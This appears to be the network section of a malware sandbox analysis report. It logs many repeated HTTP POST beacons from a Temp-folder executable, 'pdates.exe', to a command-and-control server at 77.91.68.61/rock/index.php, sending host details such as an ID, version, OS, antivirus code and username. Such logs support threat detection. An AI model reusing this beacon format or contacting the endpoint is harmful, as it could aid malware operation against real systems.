Jul 27, 2023 01:34:49.503904104 CEST	4019	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:49.554824114 CEST	4019	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:49 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
409	192.168.2.5	50129	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:49.706510067 CEST	4020	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:49.756999016 CEST	4020	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:49 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
41	192.168.2.5	49758	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:11.987854004 CEST	2886	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:12.037190914 CEST	2886	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:11 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
410	192.168.2.5	50130	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:49.947475910 CEST	4021	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:49.998178959 CEST	4021	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:49 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
411	192.168.2.5	50131	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:50.178335905 CEST	4022	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:50.228811979 CEST	4022	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:50 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
412	192.168.2.5	50132	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:50.395090103 CEST	4023	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:50.446196079 CEST	4023	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:50 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
413	192.168.2.5	50133	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:50.647449970 CEST	4024	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:50.696002960 CEST	4024	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:50 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
414	192.168.2.5	50134	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:50.873410940 CEST	4025	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:50.923310995 CEST	4025	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:50 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
415	192.168.2.5	50135	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:51.082232952 CEST	4026	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:51.130455971 CEST	4026	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:51 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
416	192.168.2.5	50136	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:51.354424000 CEST	4027	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:51.403455019 CEST	4027	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:51 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
417	192.168.2.5	50137	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:51.597661972 CEST	4028	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:51.647535086 CEST	4028	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:51 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
418	192.168.2.5	50138	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:51.834079981 CEST	4029	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:51.884145021 CEST	4029	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:51 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
419	192.168.2.5	50139	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:52.049530029 CEST	4030	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:52.099436998 CEST	4030	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:52 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
42	192.168.2.5	49759	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:12.201853037 CEST	2887	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:12.250585079 CEST	2887	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:12 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
420	192.168.2.5	50140	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:52.261368990 CEST	4030	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:52.311234951 CEST	4031	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:52 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
421	192.168.2.5	50141	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:52.495157957 CEST	4031	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:52.545072079 CEST	4032	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:52 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
422	192.168.2.5	50142	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:52.709477901 CEST	4032	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:52.760139942 CEST	4033	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:52 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
423	192.168.2.5	50143	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:52.934412956 CEST	4033	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:52.983932972 CEST	4034	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:52 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
424	192.168.2.5	50144	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:53.164609909 CEST	4034	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:53.213706017 CEST	4035	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:53 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
425	192.168.2.5	50145	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:53.413341999 CEST	4035	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:53.484539986 CEST	4035	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:53 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
426	192.168.2.5	50146	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:53.642091990 CEST	4036	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:53.689990997 CEST	4036	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:53 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
427	192.168.2.5	50147	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:53.855014086 CEST	4037	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:53.962312937 CEST	4037	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:53 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
428	192.168.2.5	50148	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:54.118880987 CEST	4038	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:54.168329954 CEST	4038	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:54 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
429	192.168.2.5	50149	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
